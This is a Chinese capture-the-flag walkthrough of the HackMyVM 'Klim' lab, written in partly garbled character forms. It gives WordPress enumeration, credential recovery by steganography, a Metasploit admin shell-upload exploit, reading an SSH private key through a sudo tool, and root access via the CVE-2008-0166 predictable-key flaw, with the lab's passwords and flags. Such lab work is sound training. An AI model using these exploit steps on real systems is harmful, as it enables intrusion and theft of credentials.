目錄

一、測(cè)試環(huán)境

1、系統(tǒng)環(huán)境

2、使用工具/軟件

二、測(cè)試目的

三、操作過(guò)程

1、信息搜集

2、Getshell

3、提權(quán)

CVE-2008-0166

四、結(jié)論

---

一、測(cè)試環(huán)境

1、系統(tǒng)環(huán)境

滲透機(jī)：kali2021.1(192.168.159.127)

靶? 機(jī)：debian(192.168.159.27)

注意事項(xiàng)：

①該類(lèi)型靶場(chǎng)只能在virtualBox上搭建，因此將靶機(jī)設(shè)置為橋接網(wǎng)絡(luò)，方便進(jìn)行滲透。攻擊機(jī)kali也要橋接出來(lái)，不然會(huì)出問(wèn)題。

②靶機(jī)啟動(dòng)失敗：設(shè)置中取消勾選usb即可

?

2、使用工具/軟件

Kali: arp-scan(主機(jī)探測(cè))、nmap(端口和服務(wù)掃描)、gobuster(目錄掃描)、cmseek(獲取cms信息)、stegseek(分析圖片隱藏信息)、msfconsole(漏洞利用模塊)、ssh(遠(yuǎn)程登錄)

測(cè)試網(wǎng)址：http://192.168.159.27

靶場(chǎng)介紹：由國(guó)外大佬搭建的靶場(chǎng)，類(lèi)似于vulnhub，經(jīng)常更新，需要翻墻才能進(jìn)。

地址：https://hackmyvm.eu/machines/machine.php?vm=Klim

二、測(cè)試目的

熟悉wordpress漏洞，熟悉ssh登錄流程，以及CVE-2008-0166漏洞利用。獲取2個(gè)flag。

三、操作過(guò)程

1、信息搜集

主機(jī)探測(cè)

arp-scan -l

靶機(jī)IP：192.168.159.27

物理機(jī)IP：192.168.159.241

端口和服務(wù)探測(cè)

nmap -sT -A -p- -T4 192.168.159.27

靶機(jī)開(kāi)放了22端口(ssh服務(wù))、80端口(web服務(wù))

目錄掃描

gobuster dir -u http://192.168.159.27 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

有wordpress目錄

掃描wordpress目錄

gobuster dir -u http://192.168.159.27/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

掃描wordpress/wp-content目錄，該目錄存在uploads目錄

查看wordpress信息

?cmseek -u http://192.168.159.27/wordpress

獲取用戶名klim

2、Getshell

在wordpress/wp-content/uploads目錄中找到一張圖片

獲取該圖片，查看是否有隱藏信息

stegseek image.jpg

可以看到，找到了密碼，輸出了文件，是有東西的

查看文件，發(fā)現(xiàn)是數(shù)據(jù)包，而且有klim用戶的密碼

cat image.jpg.out

klim/ss7WhrrnnHOZC%239bQn

數(shù)據(jù)包是經(jīng)過(guò)url編碼的，將密碼解碼

klim/ss7WhrrnnHOZC#9bQn

現(xiàn)在可以登錄wordpress了

在Plugins—Add New Plugin—Upload Plugin處可以上傳文件，直接上傳木馬會(huì)被攔

使用msfconsole模塊集成利用，上傳插件漏洞

use exploit/unix/webapp/wp_admin_shell_upload
set rhost 192.168.159.27
set targeturi /wordpress
set username klim
set password ss7WhrrnnHOZC#9bQn
run

成功返回meterpreter會(huì)話

3、提權(quán)

獲取交互式shell并查看sudo權(quán)限

python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l

看到能以klim用戶身份執(zhí)行/home/klim/tool工具

使用file查看該文件，是一個(gè)可執(zhí)行文件

file /home/klim/tool

使用help參數(shù)查看工具解析，可以看出這是cat命令，和cat命令一個(gè)作用

sudo -u klim /home/klim/tool --help

可以查看文件，那么首先查看klim用戶家目錄的文件

存在.ssh目錄，查看私鑰文件

ls -la /home/klim
sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa

將私鑰寫(xiě)入id文件并ssh登錄klim用戶

vim id
chmod 600 id
ssh klim@192.168.159.27 -i id

在當(dāng)前目錄查看user.txt

cat user.txt

user.txt: 2fbef74059deaea1e5e11cff5a65b68e

CVE-2008-0166

基于Debian的操作系統(tǒng)上的OpenSSL 0.9.8c-1到0.9.8g-9之前的版本使用隨機(jī)數(shù)生成器生成可預(yù)測(cè)的數(shù)字，這使得遠(yuǎn)程攻擊者更容易對(duì)加密密鑰進(jìn)行暴力猜測(cè)攻擊。

這個(gè)漏洞存在，生成的ssh密鑰便可被預(yù)測(cè)，數(shù)量有限。所有ssh密鑰對(duì)在如下地址下載：

https://github.com/g0tmi1k/debian-ssh/blob/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2

下載完成后，解壓，可以在rsa/2048目錄下查看所有公鑰私鑰

tar -xjf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
ls

利用該漏洞，需要找到公鑰，然后根據(jù)公鑰找到私鑰

尋找公鑰文件，發(fā)現(xiàn)在/opt目錄下有個(gè)公鑰文件，正是root用戶的公鑰文件

find / -name id_rs* -ls 2>/dev/null

根據(jù)公鑰的加密信息去匹配已知公鑰的編號(hào)

使用ssh登錄，私鑰指定為該編號(hào)即可

ssh root@192.168.159.27 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
cat root.txt

root.txt: 60667e12c8ea62295de82d053d950e1f

四、結(jié)論

Wordpress的文件上傳漏洞可以利用，openssl的漏洞導(dǎo)致私鑰可被查詢出來(lái)。